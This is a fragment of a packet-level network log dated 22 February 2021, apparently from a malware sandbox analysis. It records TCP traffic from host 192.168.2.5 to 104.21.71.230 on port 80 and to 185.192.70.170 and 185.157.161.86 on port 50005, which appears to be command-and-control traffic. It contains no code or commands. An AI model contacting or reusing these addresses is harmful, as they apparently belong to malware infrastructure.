                                                                                                                                                                Feb 22, 2021 07:46:14.227041006 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.227049112 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.227123976 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.227785110 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.227808952 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.227829933 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.227847099 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.227864981 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.227880001 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.227886915 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.227915049 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.227946997 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.228627920 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.228652000 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.228707075 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.228920937 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.228944063 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.228956938 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.228975058 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.228991985 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.229007006 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.229053020 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.229099989 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.550379992 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.550410986 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.550427914 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.550446987 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.550462961 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.550478935 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.550482988 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.550522089 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.550677061 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.550694942 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.550710917 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.550730944 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.550744057 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.550753117 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.550796986 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.585223913 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.585266113 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.585280895 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.585300922 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.585321903 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.585354090 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.585433960 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.585460901 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.585520029 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.585539103 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.585556984 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.585573912 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.585593939 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.585608006 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.585611105 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.585659981 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.586343050 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.586378098 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.586400032 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.586420059 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.586445093 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.586471081 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.586581945 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.586595058 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.587193012 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.587224007 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.587240934 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.587251902 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.587296009 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.599349022 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.599375010 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.599390984 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.599412918 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.599427938 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.599505901 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.599510908 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.599524975 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.599581957 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.599582911 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.599601030 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.599622011 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.599642038 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.599646091 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.599678040 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.600379944 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.600403070 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.600419998 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.600436926 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.600452900 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.600471973 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.600474119 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.600550890 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.612529039 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.612562895 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.612581015 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.612600088 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.612669945 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.612695932 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.612695932 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.612711906 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.612714052 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.612716913 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.612731934 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.612749100 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.612760067 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.612765074 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.612802982 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.613557100 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.613576889 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.613595963 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.613614082 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.613631964 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.613640070 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.613650084 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.613687992 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.614360094 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.614377975 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.614398956 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.614415884 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.614422083 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.614439011 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.614454031 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.614461899 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.614489079 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.615268946 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.615370989 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.625492096 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.625535965 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.625554085 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.625570059 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.625590086 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.625603914 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.625613928 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.625674963 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.625832081 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.625852108 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.625869036 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.625885010 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.625900984 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.625904083 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.625917912 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.625930071 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.625952005 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.626492023 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.626512051 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.626580954 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.626594067 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.626615047 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.626631975 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.626648903 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.626665115 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.626668930 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.626682043 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.626827955 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.626831055 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.627473116 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.627500057 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.627516985 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.627533913 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.627541065 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.627549887 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.627569914 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.627573013 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.627612114 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.628300905 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.628324986 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.628369093 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.636432886 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.636461973 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.636482000 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.636499882 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.636518002 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.636534929 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.636547089 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.636580944 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.636706114 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.636724949 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.636742115 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.636765957 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.636786938 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.636787891 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.636801004 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.636801958 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.636846066 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:14.637505054 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:14.679044008 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:16.556137085 CET4973050005192.168.2.5185.192.70.170
                                                                                                                                                                Feb 22, 2021 07:46:19.632496119 CET4973050005192.168.2.5185.192.70.170
                                                                                                                                                                Feb 22, 2021 07:46:22.073544025 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:22.121170044 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:22.150278091 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:22.150343895 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:22.150392056 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:22.150432110 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:22.150460005 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:22.150501966 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:25.633699894 CET4973050005192.168.2.5185.192.70.170
                                                                                                                                                                Feb 22, 2021 07:46:35.317835093 CET4973150005192.168.2.5185.192.70.170
                                                                                                                                                                Feb 22, 2021 07:46:38.321630001 CET4973150005192.168.2.5185.192.70.170
                                                                                                                                                                Feb 22, 2021 07:46:44.337790012 CET4973150005192.168.2.5185.192.70.170
                                                                                                                                                                Feb 22, 2021 07:46:53.735122919 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:53.990403891 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:53.990576982 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:54.328048944 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:54.591451883 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:54.610615969 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:54.879499912 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:54.932280064 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.073010921 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.366700888 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.366775990 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.401725054 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.401860952 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.404692888 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.404803038 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.407641888 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.407707930 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.419744968 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.419821978 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.441770077 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.441910028 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.446167946 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.446291924 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.459775925 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.459875107 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.461635113 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.461728096 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.472294092 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.472373009 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.482697964 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.482815981 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.737835884 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.751813889 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.751849890 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.751931906 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.751944065 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.751998901 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.752448082 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.752494097 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.752518892 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.752548933 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.758878946 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.758965969 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.775856018 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.780858994 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.780955076 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.791893005 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.802788973 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.802879095 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.808779001 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.831994057 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.832051039 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.846652985 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.848769903 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.848854065 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.856781006 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.868829966 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.868935108 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:55.874803066 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.881896019 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:55.882025003 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.009819031 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.022789955 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.022934914 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.028795004 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.040932894 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.041079998 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.050030947 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.060065031 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.060209036 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.075808048 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.085964918 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.086107969 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.090814114 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.105864048 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.105973959 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.106739998 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.117831945 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.117986917 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.123830080 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.137828112 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.137931108 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.159754992 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.165740967 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.165849924 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.171775103 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.185878038 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.185909033 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.186091900 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.195837975 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.195961952 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.208798885 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.215780020 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.215903044 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.235896111 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.243773937 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.243916035 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.251802921 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.266844034 CET5000549739185.157.161.86192.168.2.5
